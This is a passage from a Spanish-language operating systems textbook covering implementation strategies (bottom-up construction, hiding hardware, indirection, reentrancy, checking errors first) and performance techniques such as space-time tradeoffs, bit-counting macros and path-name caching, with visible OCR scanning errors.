así, y era muy satisfactorio en un entorno de minicomputadoras, cuando agregar nuevos dispositi¬ 
vos de E/S era algo que ocurría muy raras veces. En la actualidad, la mayoría de los sistemas ope¬ 
rativos permiten agregar código al kernel en forma dinámica, con toda la complejidad adicional que 
esto implica. 

13.3.7 Comparación éntrela implementación de arriba-abajo 
y la implementación de abajo-arriba 

Aunque es mejor diseñar el sistema de arriba hacia abajo, en teoría se puede implementar de arriba 
hacia abajo o de abajo hacia arriba. En una implementación de arriba-abajo, los implementadores 
empiezan con los manejadoras de llamadas al sistema y averiguan qué mecanismos y estructuras de 
datos se necesitan para darles soporte. Estos procedimientos se escriben, y el proceso continúa has¬ 
ta que se llega al hardware. 
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El problema con este método es que es difícil probar algo cuando sólo están disponibles los 
procedimientos de nivel superior. Por esta razón, muchos desarrolladores encuentran que es más 
práctico construir el sistema de abajo hacia arriba. Para este método, primero hay que escribir có¬ 
digo que oculte el hardware de bajo nivel, en esencia, la HAL de la figura 11-6. El manejo de inte¬ 
rrupciones y el driver del reloj también se requieren de manera anticipada. 

Después se puede tratar la multiprogramación, junto con un planificador simple (por ejemplo, 
la planificación por turno rotatorio). En este punto debe ser posible evaluar el sistema para ver si 
puede ejecutar varios procesos en forma correcta. Si eso funciona, ahora es tiempo de empezar la 
cuidadosa definición de las diversas tablas y estructuras de datos necesarias a lo largo del sistema, 
en especial las que se requieren para la administración de procesos e hilos y después la administra¬ 
ción de la memoria. La E/S y el sistema de archivos pueden esperar al principio, excepto una for¬ 
ma primitiva de leer el teclado y escribir en la pantalla para la evaluación y la depuración. En 
algunos casos, las estructuras de datos de bajo nivel se deben proteger al permitir el acceso sólo me¬ 
diante procedimientos de acceso específicos: en efecto, la programación orientada a objetos, sin im¬ 
portar cuál sea el lenguaje de programación. A medida que se completan los niveles inferiores, se 
pueden evaluar con detalle. De esta forma, el sistema avanza de abajo hacia arriba, algo muy simi¬ 
lar a la forma en que los contratistas construyen edificios de oficina altos. 

Si hay un equipo grande disponible, un método alternativo es realizar primero un diseño deta¬ 
llado de todo el sistema, y después asignar grupos distintos para escribir módulos diferentes. Cada 
uno prueba su propio trabajo en aislamiento. Cuando todas las piezas están listas, se integran y eva¬ 
lúan. El problema con esta línea de ataque es que si nada funciona al principio, puede ser difícil de¬ 
terminar de manera aislada si están fallando uno o más módulos, o si un grupo malentendió lo que 
se suponía debía hacer otro módulo. Sin embargo, con equipos grandes, este método se utiliza con 
frecuencia para maximizar la cantidad de paralelismo en el esfuerzo de programación. 


13.3.8 Técnicas útiles 

Acabamos de analizar algunas ideas abstractas para el diseño y la implementación de sistemas. 
Ahora examinaremos varias técnicas concretas útiles para la implementación de sistemas. Desde 
luego que hay muchas otras, pero las limitaciones de espacio nos restringen a sólo unas cuantas. 


Ocultar el hardware 

Gran parte del hardware es desagradable. Se tiene que ocultar lo más pronto posible (a menos que 
exponga poder, y en la mayoría del hardware no esasíj.Algunosde los diversos detalles de bajo ni¬ 
vel se pueden ocupar mediante un nivel tipo HAL, del tipo que se muestra en la figura 13-2. Sin 
embargo, muchos detalles del hardware no se pueden ocultar de esta manera. 

Algo que merece atención anticipada es la forma de lidiar con las interrupciones. Hacen que la 
programación sea desagradable, pero los sistemas operativos tienen que lidiar con ellas. Un méto¬ 
do para ello es convertí rías en algo más de inmediato. Por ejemplo, toda interrupción se podría con- 
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vertir en un hilo emergente al instante. En ese momento estamos tratando con hilos en vez de inte¬ 
rrupciones. 

Un segundo método es convertir cada interrupción en una operación uniock en un mutex por 
el que espera el driver correspondiente. Así, el único efecto de una interrupción es hacer que un hi¬ 
lo cambie al estado listo. 

Un tercer método es convertir una interrupción en un mensaje para algún hilo. El código de 
bajo nivel sólo crea un mensaje que indica de dónde provino la interrupción, lo pone en cola y lla¬ 
ma al planificador para ejecutar (potencialmente) el manejador, que tal vez estaba bloqueado en 
espera del mensaje. Lo que hacen todas estas técnicas (y otras como ellas) es tratar de convertir 
las interrupciones en operaciones de sincronización de hilos. Es más fácil administrar el hecho de 
que cada interrupción se maneje mediante un hilo apropiado en un contexto apropiado que ejecu¬ 
tar un manejador en el contexto arbitrario en el que ocurrió. Desde luego que esto se debe realizar 
con eficiencia, pero en un nivel muy profundo del sistema operativo todo se debe realizar con efi¬ 
ciencia. 

La mayoría délos sistemas operativos están diseñados para ejecutarse en varias plataformas de 
hardware. Estas plataformas pueden diferir en términos del chip de la CPU, la M M U, la longitud 
de las palabras, el tamaño de la RAM y otras características que no se pueden enmascarar con fa¬ 
cilidad mediante el HA L o su equivalente. Sin embargo, es muy conveniente tener un solo conjun¬ 
to de archivos de código fuente que se utilicen para generar todas las versiones: en caso contrario, 
cada error que aparezca después se deberá corregir varias veces en varios códigos fuente, con el pe¬ 
ligro de que éstos se distancien. 

Para resolver algunas diferencias del hardware (como el tamaño de la RAM), el sistema ope¬ 
rativo debe determinar el valor en tiempo de inicio y mantenerlo en una variable. Por ejemplo, los 
asignadores de memoria pueden utilizar la variable del tamaño de la RAM para determinar el tama¬ 
ño de la caché de bloques, las tablas de páginas, etc. Incluso se puede definir el tamaño de las ta¬ 
blas estáticas (como la tabla de procesos) con base en la memoria total disponible. 

Sin embargo, otras diferencias (como distintos chips de CPU) no se pueden resolverá! tener un 
solo binario que determine en tiempo de ejecución en qué CPU se está ejecutando. Una manera de 
tratar con el problema de un código fuente y varios destinos es utilizar la compilación condicional. 
En los archivos de código fuente se definen ciertas banderas en tiempo de compilación para las dis¬ 
tintas configuraciones, y se utilizan para agrupar código que es dependiente de la CPU, la longitud 
de las palabras, la M M U, etc. Por ejemplo, imagine un sistema operativo que se debe ejecutar en 
los chips Pentium o UltraSPARC, que necesitan distinto código de inicialización. El procedimien¬ 
to init se podría escribir como se ilustra en la figura 13-6(a). Dependiendo del valor de CPU, que 
se define en el archivo de encabezado config.h, se realiza un tipo de inicialización u otro. Como el 
binario actual contiene sólo el código necesario para la máquina de destino, no hay pérdida de efi¬ 
ciencia de esta forma. 

Como segundo ejemplo, suponga que se requiere un tipo de datos Registro, el cual debe ser de 
32 bits en el Pentium y de 64 bits en el UltraSPARC. Esto se podría manejar mediante el código 
condicional de la figura 13-6(b) (suponiendo que el compilador produzca enteros de 32 bits y ente¬ 
ros largos de 64 bits). Una vez que se realiza esta definición (probablemente en un archivo de en¬ 
cabezado que se incluirá en todas partes), el programador sólo tiene que declarar variables de tipo 
Registro y éstas tendrán la longitud correcta. 
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#include “config.h' 


#include “config.h’ 


#if (CPU == PENTIUM) 

/* Aquí va la inicialización del Pentium. 7 
#endif 


init() 


#if (LONG_PALABRA == 32) 
typedef int Registro; 

#endif 


#if (CPU == ULTRASPARC) 

/* Aquí va la inicialización del UltraSPARC. 7 
#endif 


#if (LONG_PALABRA == 64) 
typedef long Registro; 

#endif 


Registro RO, R1, R2, R3; 


(a) 


(b) 


Figura 13-6. (a) Compilación condicional dependiente de la CPU. (b) Compilación 
condicional dependiente de la longitud de las palabras. 


Desde luego que el archivo de encabezado config.h se tiene que definir de manera correcta. Pa¬ 
ra el Pentium podría ser algo así: 

#clefine CPU PENTIUM 
#clefine LONG_PALABRA 32 

Para compilar el sistema para el UltraSPARC se utilizaría un archivo config.h distinto, con los va¬ 
lores correctos para este procesador, como por ejemplo: 

#clefine CPU ULTRASPARC 
#clefine LONG_PALABRA 64 

Algunos lectores tal vez se pregunten por qué CPU y LONG_PALABRA se manejan mediante distin¬ 
tas macros. Podríamos haber agrupado fácilmente la definición de Registro con una prueba sobre 
CPU, para establecer su valor en 32 bits para el Pentium y 64 bits para el UltraSPARC. Sin embar¬ 
go, esto no es conveniente. Considere lo que ocurre si después portamos el sistema al procesador In¬ 
tel Itanium de 64 bits. Tendríamos que agregar una tercera instrucción condicional a la figura 13-6(b) 
para el Itanium. Si lo hacemos como hasta ahora, todo lo que tenemos que hacer es incluir la línea 

#clefine LONG_PALABRA 64 

en el archivo config.h para el Itanium. 

Este ejemplo ilustra el principio de ortogonal i dad que vimos antes. Los elementos que son de¬ 
pendientes de la CPU se deben compilar de manera condicional con base en la macro CPU, y los 
que son dependientes de la longitud de las palabras deben utilizar la macro LONG_PALABRA. Pa¬ 
ra muchos otros parámetros se aplican consideraciones similares. 
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Indirección 

A Igunas veces se dice que no hay un problema en las ciencias computacionales que no se pueda re¬ 
solver con otro nivel de indirección. Aunque es en parte una exageración, sin duda hay algo de ver¬ 
dad aquí. Vamos a considerar algunos ejemplos. En los sistemas basados en Pentium, cuando se 
oprime una tecla el hardware genera una interrupción y coloca el número de tecla (en vez del códi¬ 
go de carácter ASCII) en un registro de dispositivo. Después, cuando la tecla se libera se genera una 
segunda interrupción, también con el número de clave. Esta indirección permite al sistema operati¬ 
vo la posibilidad de utilizar el número de tecla para indexar en una tabla y obtener el carácter AS¬ 
CII, con lo cual es fácil manejar los diversos teclados que se utilizan en todo el mundo en distintos 
países. Al obtener la información cuando se oprime y libera la tecla es posible utilizar cualquier te¬ 
cla como una tecla de mayúsculas, ya que el sistema operativo conoce la secuencia exacta en que 
se oprimieron y liberaron las teclas. 

La indirección también se utiliza en la salida. Los programas pueden escribir caracteres ASCII 
en la pantalla, pero éstos se interpretan como índices en una tabla para el tipo de letra de salida ac¬ 
tual. La entrada en la tabla contiene el mapa de bits para el carácter. M ediante esta indirección es 
posible separar los caracteres de los tipos de letras. 

Otro ejemplo de indirección es el uso de números de dispositivo mayores en UNIX. Dentro del 
kernel hay una tabla indexada por número de dispositivo mayor para los dispositivos de bloque y 
otro para los dispositivos de carácter. Cuando un proceso abre un archivo especial como /dev/hdO, 
el sistema extrae el tipo (bloque o carácter) y los números de dispositivo mayor y menor del nodo- 
i, y los indexa en la tabla de drivers apropiada para encontrar el driver. Esta indirección facilita la 
reconfiguración del sistema, ya que los programas tratan con nombres de dispositivos simbólicos y 
no con los nombres reales de los drivers. 

Otro ejemplo más de indirección ocurre en los sistemas de paso de mensajes que nombran una 
bandeja de correo en vez de un proceso como el destino del mensaje. Al realizar la indirección a 
través de bandejas de correo (a diferencia de nombrar un proceso como el destino), se puede obte¬ 
ner una flexibilidad considerable (por ejemplo, hacer que una secretaria se encargue de los mensa¬ 
jes de su jefe). 

En cierto sentido, el uso de macros tales como 

#clefine TAM_TABLA_PROC 256 

es también una forma de indirección, ya que el programador puede escribir código sin tener que sa¬ 
ber qué tan grande es realmente la tabla. Es una buena práctica otorgar nombres simbólicos a todas 
las constantes (excepto algunas veces -1, 0 y 1) y colocarlos en encabezados con comentarios que 
expliquen su función. 

Reutilización 

Con frecuencia es posible reutilizar el mismo código en contextos ligeramente distintos. Esto es una 
buena idea, ya que reduce el tamaño del archivo binario y significa que el código sólo se tiene que 
depurar una vez. Por ejemplo, suponga que se utilizan mapas de bits para llevarla cuenta délos blo- 
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ques libres en el disco. Para manejar la administración de los bloques de disco se pueden utilizar 
los procedimientos alloc y free, que administran los mapas de bits. 

Como mínimo, estos procedimientos deben funcionar para cualquier disco. Pero podemos ir 
más allá de eso. Los mismos procedimientos también pueden funcionar para administrar los blo¬ 
ques de memoria, los bloques en la caché de bloques del sistema de archivo y los nodos-i. De he¬ 
cho, se pueden utilizar para asignar y desasignar todos los recursos que se puedan enumerar en 
forma lineal. 

Reentrancia 

La reentrancia se refiere a la habilidad de ejecutar código dos o más veces al mismo tiempo. En un 
multi procesador, siempre existe el peligro deque mientras una CPU ejecuta un procedimiento, otra 
CPU empiece a ejecutarlo también, antes de que haya terminado el primero. En este caso, dos (o 
más) hilos en distintas CPUs podrían ejecutar el mismo código al mismo tiempo. Hay que proteger¬ 
se de esa situación mediante el uso de mutexes o cualquier otro medio para proteger las regiones 
críticas. 

Sin embargo, el problema también existe en un uniprocesador. En especial, la mayoría de los 
sistemas operativos se ejecutan con las interrupciones habilitadas. Délo contrario se perderían mu¬ 
chas interrupciones y el sistema no sería confiable. M ientras el sistema operativo está ocupado eje¬ 
cutando cierto procedimiento P, es completamente posible que ocurra una interrupción y que el 
manejador de interrupciones también llame a P. Si las estructuras de datos de P estuvieran en un 
estado inconsistente al momento de la interrupción, el manejador los verá en un estado inconsisten¬ 
te y fallará. 

Un ejemplo obvio en donde puede ocurrir esto es si P es el planificador. Suponga que cierto 
proceso utilizó su quantum y el sistema operativo lo estaba desplazando al final de su cola. Luego, 
a mitad de la manipulación de la lista ocurre la interrupción, hace que un proceso cambie al estado 
listo y ejecuta el planificador. Con las colas en un estado inconsistente, es probable que el sistema 
falle. Como consecuencia incluso en un uni procesador, es mejor que la mayor parte del sistema ope¬ 
rativo sea reentrante, que las estructuras de datos críticas estén protegidas por mutexes y que las in¬ 
terrupciones se deshabiliten cuando no se puedan tolerar. 

Fuerza bruta 

El uso de fuerza bruta para resolver un problema ha acumulado una mala reputación a través de los 
años, pero con frecuencia es el método más conveniente debido a su simplicidad. Cada sistema ope¬ 
rativo tiene muchos procedimientos que reciben muy pocas llamadas, o que operan con tan pocos 
datos que no vale la pena optimizarlos. Por ejemplo, con frecuencia es necesario buscar en varias 
tablas y arreglos dentro del sistema. El algoritmo de fuerza bruta es sólo dejar la tabla en el orden 
en el que se realizan las entradas y buscar en forma lineal cuando haya que realizar una búsqueda. 
Si el número de entradas es pequeño (por ejemplo, menor de 1000), la ganancia de ordenar la tabla 
o generar valores de hash es poca, pero el código es mucho más complicado y es más probable que 
contenga errores. 
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Desde luego que para las funciones que están en la ruta crítica (como el cambio de contexto), 
se debe hacer todo el esfuerzo posible para que sean muy rápidas, tal vez hasta escribirlas en len¬ 
guaje ensamblador (como último recurso). Pero las partes extensas del sistema no están en la ruta 
crítica. Por ejemplo, muchas llamadas al sistema se invocan raras veces. Si hay una llamada a fork 
cada segundo y requiere 1 mseg para llevarse a cabo, entonces aunque se optimice a 0 sólo gana un 
0.1%. Si el código optimizado es mayor y tiene más errores, tal vez sea más conveniente no llevar 
a cabo la optimización. 

Comprobar errores primero 

M uchas llamadas al sistema pueden llegar a fallas por una variedad de razones: el archivo que se 
va a abrir pertenece a alguien más; la creación del proceso falla debido a que la tabla de procesos 
está llena: o una señal no se puede enviar debido a que el proceso de destino no existe. El sistema 
operativo debe comprobar con detalle todos los errores posibles antes de llevar a cabo la llamada. 

M uchas llamadas al sistema también requieren la adquisición de recursos, como ranuras en la 
tabla de procesos, ranuras en la tabla de nodos-i o descriptores de archivos. U n consejo general que 
puede ahorrar muchos problemas es comprobar primero si la llamada al sistema se puede llevar a 
cabo antes de adquirir recursos. Esto significa colocar todas las pruebas al principio del procedi¬ 
miento que ejecuta la llamada al sistema. Cada prueba debe ser de la siguiente forma: 

if (conclicion_error) return (CODIGO_ERROR); 

Si la llamada pasa por toda la gama de pruebas, entonces es seguro que tendrá éxito. En ese punto 
se pueden adquirir los recursos. 

Intercalar las pruebas con la adquisición de recursos significa que si falla alguna prueba a lo 
largo del camino, todos los recursos adquiridos hasta ese punto se deben regresar. Si se comete un 
error aquí y no se devuelve cierto recurso, los daños no se reflejan de inmediato. Por ejemplo, una 
entrada en la tabla de procesos tal vez ya no esté disponible en forma permanente. Sin embargo, du¬ 
rante cierto periodo este error se puede activar varias veces. En un momento dado, la mayoría de 
las entradas (o todas) en la tabla de procesos tal vez ya no estén disponibles, con lo cual se produ¬ 
cirá un fallo del sistema de una forma en extremo impredecible y difícil de depurar. 

M uchos sistemas sufren de este problema en la forma de fugas de memoria. Por lo general, el 
programa llama a malloc para asignar espacio pero olvida llamar a free más adelante para liberar¬ 
lo. De esta forma, la memoria va desapareciendo en forma gradual hasta que se agota y se reinicia 
el sistema. 

Engler y sus colaboradores (2000) han propuesto una forma interesante de comprobar algunos 
de estos errores en tiempo de compilación. E líos observaron que el programador conoce muchas in¬ 
variantes que el compilador no conoce: por ejemplo, cuando se bloquea un mutex, todas las rutas 
que inician en el bloqueo deben de contener un desbloqueo y no debe haber más bloqueos del mis¬ 
mo mutex. Han ideado una forma para que el programador indique al compilador este hecho y lo 
instruya para que compruebe todas las rutas en tiempo de compilación, en caso de que haya viola¬ 
ciones de la invariante. El programador también puede especificar que la memoria asignada se de¬ 
be liberar en todas las rutas y muchas otras condiciones también. 
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13.4 RENDIMIENTO 

En igualdad de condiciones, un sistema operativo rápido es mejor que uno lento. Sin embargo, un 
sistema operativo rápido pero no confiable no es tan bueno como uno lento pero confiable. Como 
las optimizaciones complejas a menudo producen errores, es importante utilizarlas con moderación. 
A pesar de esto, hay lugares en donde el rendimiento es crítico y las optimizaciones bien valen el 
esfuerzo. En las siguientes secciones analizaremos algunas técnicas generales que se pueden utili¬ 
zar para mejorar el rendimiento en lugares en donde se requiere. 


13.4.1 ¿Por qué son lentos los sistemas operativos? 

Antes de hablar sobre técnicas de optimización, vale la pena recalcar que la lentitud de muchos sis¬ 
temas operativos es en gran parte auto-infligida. Por ejemplo, los sistemas operativos antiguos co¬ 
mo MS-DOS y UNIX versión 7 se iniciaban en unos cuantos segundos. Los sistemas UNIX y 
Windows Vista modernos pueden requerir minutos para iniciarse, a pesar de que se ejecutan en 
hardware que es 1000 veces más rápido. La razón es que están haciendo muchas cosas más, se de¬ 
seen o no. Un caso en cuestión. La tecnología plug and play facilita de cierta manera la instalación 
de un nuevo dispositivo de hardware, pero el precio a pagar es que en cada inicio, el sistema ope¬ 
rativo tiene que inspeccionar todo el hardware para ver si hay algo nuevo. Esta exploración del bus 
requiere tiempo. 

Un método alternativo (y, según la opinión del autor, mejor) sería desechar por completo la tec¬ 
nología plug-and-play y tener en la pantalla un icono llamado "Instalar nuevo hardware". Al insta¬ 
lar un nuevo dispositivo de hardware, el usuario haría clic en este icono para empezar la exploración 
del bus, en vez de hacerlo en cada inicio del sistema. Por supuesto que los diseñadores de los siste¬ 
mas actuales estaban muy al tanto de esta opción. La rechazaron, básicamente debido a que supo¬ 
nían que los usuarios eran demasiado estúpidos como para poder hacer esto en forma correcta 
(aunque lo definieron de una manera más amable). Éste es sólo un ejemplo, pero hay muchos más 
en donde el deseo de hacer al sistema "amigable para el usuario" (o "a prueba de idiotas", depen¬ 
diendo del punto de vista del lector) reduce su velocidad todo el tiempo y para todos. 

Tal vez lo mejor que pueden hacer los diseñadores para mejorar el sistema es ser mucho más 
selectivos en cuanto a agregar nuevas características. La pregunta por hacer no es "¿A algunos usua¬ 
rios les gusta?" sino "¿Vale la pena el inevitable sacrificio en cuanto al tamaño del código, la veloci¬ 
dad, complejidad y confiabilidad?". Sólo si las ventajas superan de manera concisa a las desventajas 
es cuando se debe incluir. Los programadores tienen la tendencia a suponer que el tamaño de códi¬ 
go y el conteo de errores serán de 0 y la velocidad será infinita. La experiencia muestra que esta 
idea es un poco optimista. 

Otro factor que participa en el rendimiento es el marketing de los productos. Para cuando la 
versión 4 o 5 llega al mercado, tal vez se hayan incluido todas las características que son actual¬ 
mente útiles, y la mayoría de las personas que necesitan el producto ya lo tienen. Sin embargo, pa¬ 
ra continuar con las ventas, muchos fabricantes continúan produciendo un flujo continuo de nuevas 
versiones con más características, sólo para que puedan vender actualizaciones a sus clientes exis- 
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Lentes. A gregar nuevas características sólo por ello puede ayudar en las ventas, pero raras veces ayu¬ 
da en el rendimiento. 

13.4.2 ¿Qué se debe optimizar? 

Como regla general, la primera versión el sistema debe ser lo más simple posible. Las únicas opti¬ 
mizaciones deben ser cosas que sin duda indiquen un problema inevitable. Tener una caché de blo¬ 
ques para el sistema de archivos es un ejemplo. Una vez que el sistema esté en funcionamiento, se 
deben realizar mediciones cuidadosas para ver a dónde se va realmente el tiempo. Con base en es¬ 
tas cifras, se deben realizar optimizaciones en donde sean más útiles. 

He aquí una verdadera historia de una optimización que hizo más daño que beneficio. Uno de 
los estudiantes del autor (cuyo nombre no divulgaremos) escribió el programa mkfs de M INIX. Es¬ 
te programa establece un nuevo sistema de archivos en un disco recién formateado. El estudiante 
invirtió aproximadamente 6 meses para optimizarlo, incluyendo la integración de una caché de dis¬ 
co. Cuando lo entregó no funcionó y se requirieron varios meses adicionales de depuración. Por lo 
general, este programa se ejecuta en el disco duro una vez durante la vida de la computadora, cuan¬ 
do se instala el sistema. También se ejecuta una vez por cada disco flexible que se formatea. Cada 
ejecución tarda aproximadamente 2 segundos. Incluso si la versión sin optimizar hubiera tardado 1 
minuto, era un mal uso de recursos invertir tanto tiempo en optimizar un programa que se utiliza 
con tan poca frecuencia. 

Un eslogan que tiene una aplicación considerable en cuanto a la optimización del rendimiento 
es: 


Lo bastante bueno es suficiente. 

Con esto queremos decir que, una vez que el rendimiento ha logrado un nivel razonable, tal vez no 
valga la pena el esfuerzo y la complejidad requeridos para exprimir un poco más de porcentaje. Si 
el algoritmo de planificación es razonablemente justo y mantiene ocupada la CPU 90% del tiempo, 
está haciendo su trabajo. Es probable que idear un algoritmo más complejo que tenga 5% más de 
rendimiento sea mala idea. De manera similar, si la tasa de paginación es lo bastante baja como pa¬ 
ra que no se convierta en un cuello de botella, por lo general no vale la pena esforzarse demasiado 
por obtener un rendimiento óptimo. Es mucho más importante evitar el desastre que obtener un ren¬ 
dimiento óptimo, en especial cuando lo que es óptimo con cierta carga tal vez no sea óptimo con 
otra. 

13.4.3 C oncesiones entre espacio y tiempo 

Un método general para mejorar el rendimiento es sacrificar el tiempo para obtener más espacio. 
En las ciencias computacionales, con frecuencia hay que elegir entre un algoritmo que utiliza poca 
memoria pero es lento, y un algoritmo que utiliza mucha más memoria pero es más rápido. Al rea¬ 
lizar una optimización importante, vale la pena buscar algoritmos que obtengan más velocidad al 
utilizar más memoria, o que por el contrario ahorren más memoria al realizar más cálculos. 
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U na técnica útil en muchos casos es la de reemplazar los procedimientos pequeños por macros. 
Al utilizar una macro se elimina la sobrecarga que por lo general se asocia con la llamada a un pro¬ 
cedimiento. La ganancia es en especial considerables! la llamada ocurre dentro de un ciclo. Como 
un ejemplo, suponga que utilizamos mapas de bits para llevar la cuenta de los recursos y con fre¬ 
cuencia necesitamos saber cuántas unidades están libres en cierta parte del mapa de bits. Para este 
propósito necesitamos un procedimiento llamado cuenta_bits, el cual cuenta el número de bits que 
son 1 en un byte. El procedimiento simple se muestra en la figura 13-7(a). Recorre los bits en un 
byte, contándolos uno a la vez. 

#define TAM_BYTES 8 /* Un byte contiene 8 bits */ 

int cuenta_bits(int byte) 

{ /* Cuenta ios bits en un byte. 7 

int i, cuenta = 0; 

for (i=0; i<TAM_BYTES; i++) /* itera sobre ios bits en un byte 7 

if ((byte»i)&1) cuenta++; /* si este bit es 1, io suma a cuenta 7 

return(cuenta); /* devueive ia suma 7 

} 


(a) 

/* Macro para sumar los bits en un byte y devolver la suma. 7 
#define cuenta_bits(b) ((b&1 )+((b»1 )&1 )+((b»2)&1 )+({b»3)&1 )+\ 

{{b»4)&1 )+((b»5)&1 )+((b»6)&1 )+({b»7)&1)) 

(b) 

/* Macro para buscar la cuenta de bits en una tabla. 7 
char bits[256H0,1,1,2,1,2,2,3,1,2,2,3,2,3,3,4,1,2,2,3,2,3,3,...}; 

#define cuenta_bits(b) (int) bits[b] 

(C) 

Figura 13-7. (a) U n procedimiento para contar los bits en un byte. (b) U na macro para 
contar los bits, (c) U na macro que cuenta los bits mediante una búsqueda en una tabla. 

Este procedimiento tiene dos fuentes de ineficiencia. En primer lugar se debe llamar, se debe 
asignar espacio para él en la pila y debe regresar. Cada llamada a un procedimiento tiene esta sobre¬ 
carga. En segundo lugar, contiene un ciclo y siempre hay cierta sobrecarga asociada con un ciclo. 

La macro de la figura 13-7(b) es un método completamente distinto. Es una expresión en línea 
que calcula la suma de los bits al desplazar de manera sucesiva el argumento, enmascarar todo excep¬ 
to el bit de menor orden y sumar los ocho términos. La macro es difícilmente una obra de arte, pero 
aparece en el código sólo una vez. Por ejemplo, cuando se hace una llamada a la macro mediante 

suma = cuenta_bits(tabla[i]); 

la llamada a la macro se ve idéntica a la del procedimiento. Así, aparte de una definición algo com¬ 
plicada, el código en el caso de la macro no se ve peor que en el caso del procedimiento, pero es 
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mucho más eficiente ya que eiimina tanto ia sobrecarga en ia iiamada ai procedimiento como ia so¬ 
brecarga dei cicio. 

Podemos profundizar más en este ejempio. ¿Para qué caicuiar ia cuenta de bits? ¿Por qué no 
buscada en una tabia? Después de todo, hay sóio 256 bytes distintos, cada uno con un vaior entre 
O y 8. Podemos deciarar una tabia con 256 entradas iiamada bits, en donde cada entrada se iniciaii- 
za (en tiempo de compiiación) con ia cuenta de bits correspondiente ai vaior de ese byte. Con este 
método no se requiere ningún cáicuio en tiempo de ejecución, sóio una operación de indexamiento. 
En ia figura 13-7(c) se muestra una macro que hace ei trabajo. 

Éste es un ciaro ejempio de ia concesión entre ei tiempo de cáicuio para obtener más memoria. 
Sin embargo, podríamos profundizar todavía más. Si se necesitan ias cuentas de bits para paiabras 
compietasde32 bits, mediante ei uso de nuestra macro cuenta_bits necesitamos reai izar cuatro bús¬ 
quedas por paiabra. Si expandimos ia tabia a 65,536 entradas sóio se requerirán dos búsquedas por 
paiabra, a cambio de una tabia mucho más grande. 

La búsqueda de respuestas en tabias también se puede utiiizar de otras formas. Por ejempio, en 
ei capítuio 7 vimos cómo funciona ia compresión de imágenes] PEG mediante transformaciones de 
coseno discretas bastante compiejas. Una técnica de compresión aiternativa, conocida como GIF, 
utiliza la búsqueda en tablas para codificar píxeles RGB de 24 bits. Sin embargo, GIF sólo funcio¬ 
na en imágenes con 256 colores o menos. Para comprimir cada imagen se construye una paleta de 
256 colores y cada entrada contiene un valor RGB de 24 bits. Así, la imagen comprimida consiste 
en un índice de 8 bits para cada píxel en vez de un valor de color de 24 bits, con lo cual se obtiene 
una ganancia de un factor de tres. Esa idea se ilustra para una sección de 4 x 4 de una imagen en 
la figura 13-8. En la figura 13-8(a) se muestra la imagen comprimida original. Cada valor es de 24 
bits, con 8 bits para la intensidad de rojo, verde y azul, respectivamente. La imagen GIF se mues¬ 
tra en la figura 13.8(b). Cada valor es un índice de 8 bits en la paleta de colores. Esta paleta se al¬ 
macena como parte del archivo de imagen, y se muestra en la figura 13-8(c). En realidad hay más 
detalles con respecto a GIF, pero la idea básica es la búsqueda en la tabla. 

Flay otra forma de reducir el tamaño de una imagen, en la cual se muestra una concesión dife¬ 
rente. PostScript es un lenguaje de programación que se puede utilizar para describir imágenes (en 
realidad, cualquier lenguaje de programación puede describir imágenes, pero PostScript está opti¬ 
mizado para este fin). M uchas impresoras tienen integrado un intérprete de PostScript para poder 
ejecutar los programas de PostScript que reciben. 

Por ejemplo, si hay un bloque rectangular de píxeles del mismo color en una imagen, un pro¬ 
grama de PostScript para la imagen tendría instrucciones para colocar un rectángulo en cierta ubi¬ 
cación y rellenarlo con cierto color. Se requiere de sólo unos cuantos bits para ejecutar este 
comando. Cuando la impresora recibe la imagen, un intérprete integrado debe ejecutar el programa 
para construir la imagen. De esta manera, PostScript logra la compresión de datos a cambio de más 
cálculos, una concesión distinta a la de la búsqueda en una tabla, pero valiosa cuando no se tiene 
mucha memoria o ancho de banda.Otras concesiones involucran a menudo estructuras de datos. Las 
listas con enlace doble ocupan más memoria que las listas con enlace simple, pero a menudo per¬ 
miten un acceso más rápido a los elementos. Las tablas de hash desperdician más espacio incluso, 
pero de todas formas son más rápidas. En resumen, uno de los principales puntos a considerar al 
optimizar una pieza de código es si el uso de distintas estructuras de datos sería la mejor concesión 
entre tiempo y espacio. 
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Figura 13-8. (a) Parte de una imagen descomprimida con 24 bits por pixel. (b) La mis¬ 
ma parte comprimida con GIF, con 8 bits por pixel. (c) La paleta de colores. 


13.4.4 Uso de caché 

La caché es una técnica reconocida para mejorar el rendimiento. Se puede aplicar cada vez que exis¬ 
ta la probabilidad de requerir el mismo resultado varias veces. El método general es realizar todo el 
trabajo la primera vez y después guardar el resultado en la caché. En los intentos subsiguientes, pri¬ 
mero se comprueba la caché. Si el resultado está ahí, se utiliza. En caso contrario, se vuelve a ha¬ 
cer todo el trabajo. 

Ya hemos visto el uso de la caché dentro del sistema de archivos para guardar cierto número 
de bloques de disco de uso reciente, con lo cual se obtiene un ahorro de una lectura de disco en ca¬ 
da ocurrencia. Sin embargo, la caché se puede utilizar para muchos otros fines también. Por ejem¬ 
plo, aunque no lo parezca, el análisis de los nombres de rutas es un proceso que exige muchos 
recursos. Considere el ejemplo de UNIX de la figura 4-35 de nuevo. Para buscar/usr/ast/mbox se 
requieren los siguientes accesos al disco: 

1. Leer el nodo-i para el directorio raíz (nodo-i 1). 

2. Leer el directorio raíz (bloque 1). 

3. Leer el nodo-i para/usr (nodo-i 6). 

4. Leer el directorio /usr (bloque 132). 

5. Leer el nodo-i para /usr/ast (nodo-i 26). 

6. Leer el directorio/usr/ast (bloque 406). 

Se requieren seis accesos al disco sólo para descubrir el número de nodo-i del archivo. Después se 
tiene que leer el mismo nodo-i para descubrir los números de bloques de disco. Si el archivo es más 
pequeño que el tamaño del bloque (por ejemplo, 1024 bytes), se requieren 8 accesos al disco para 
leer los datos. 
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Algunos sistemas optimizan ei anáiisis de ios nombres de rutas ai poner en caché ias combina¬ 
ciones (ruta, nodo-i). Para ei ejempio de ia figura 4-35, es evidente que ia caché contendrá ias pri¬ 
meras tres entradas de ia figura 13-9 después de anaiizar /usr/ast/mbox. Las úitimas tres entradas 
provienen dei anáiisis de otras rutas. 


Ruta 

Número de nodo-i 

/usr 

6 

/usr/ast 

26 

/usr/ast/mbox 

60 

/usr/ast/libros 

92 

/usr/bal 

45 

/usr/bal/articuio.ps 

85 


Figura 13-9. Parte de la caché de nodos-i para la figura 4-35. 


Cuando hay que buscar una ruta, ei anaiizador de nombres primero consuita en ia caché y bus¬ 
ca ia subcadena más iarga que esté presente. Por ejempio, si se presenta ia ruta /usr/ast/concesio- 
nes/stw, ia caché devueive ei hecho de que/usr/ast es ei nodo-i 26, por io que ia búsqueda puede 
empezar ahí y se ei i minan cuatro accesos ai disco. 

